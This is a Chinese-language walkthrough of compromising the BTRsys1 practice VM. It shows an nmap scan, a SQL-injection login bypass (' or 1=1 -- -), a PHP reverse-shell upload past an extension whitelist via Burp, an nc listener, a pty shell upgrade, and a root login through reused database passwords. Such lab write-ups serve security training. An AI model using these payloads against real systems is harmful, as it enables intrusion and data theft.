BTRsys1渗透实战

BTRsys1渗透，该靶机没有什么难度，无聊拿来练一练吧！！！
期待BTRsys-2靶机。。。
靶机IP：192.168.8.135

改一下hosts，加快访问速度:

192.168.8.135 btr.local

nmap全端口扫

nmap -sS -Pn -A -p- -n 192.168.8.135

1

开放的端口和服务：

21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

sql注入绕过登录

dir爆目录：

http://btr.local/hakkimizda.php
http://btr.local:80/uploads/
http://btr.local:80/login.php/

这个靶机太草率了吧，啥重要的信息都没有，就一个登录入口。

这要么爆破，要么注入、绕过登录。。。

2

右键查看下源码：

3
重要的源码：

    var str=user.substring(user.lastIndexOf("@")+1,user.length);
    if((pwd == "'")){
        alert("Hack Denemesi !!!"); 
    }
    else if (str!="btrisk.com"){
        alert("Yanlis Kullanici Bilgisi Denemektesiniz");

substring就是截取，从“@”符号后一位开始截取到输入的user账号的长度，即从@到结束；且str中必须是btrisk.com

pwd很明显，直接随便构造一个注入

账号：123@btrisk.com
密码：' or 1=1 -- -

直接绕过的登录到http://btr.local/personel.php

4

burp截包-上传文件getshell

可以上传，直接上反弹phpshell

5

咦~，白名单写死了，只能是JPG或者PNG，那就将shell.php改成shell.jpg

burp截包，截断将jpg后缀改成php后缀，go，上传成功

6
在http://btr.local/uploads/中可以看到上传的反弹phpshell
7
在kali中nc -lvp 4444打开监听，等待反弹
8

提权

进入shell中，到网站根目录看下配置文件config.php

9

$con=mysqli_connect("localhost","root","toor","deneme");

发现本地数据库deneme可以登录

先用python切换到bash：

python -c 'import pty;pty.spawn("/bin/bash")'

直接登录数据库看看有什么

mysql -u root -p

10

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)
mysql> use deneme;
use deneme;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user             |
+------------------+
1 row in set (0.00 sec)

mysql> select * from user
select * from user
    -> ;
;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
|  1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | cdmir@btrisk.com | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+

密码都是：asd123***

直接su root，

11
root成功

总结

1、该靶机的重点在于只给你一个登陆界面，啥信息都没有的情况下，要么爆破，要么注入、绕过。
2、后台上传界面，而且上传后也没有检查文件名，截包绕过白名单限制上传。

BTRsys1靶机百度云下载
链接：https://pan.baidu.com/s/1T56kPpQkuh3QAp-fveV6UQ
提取码：34zn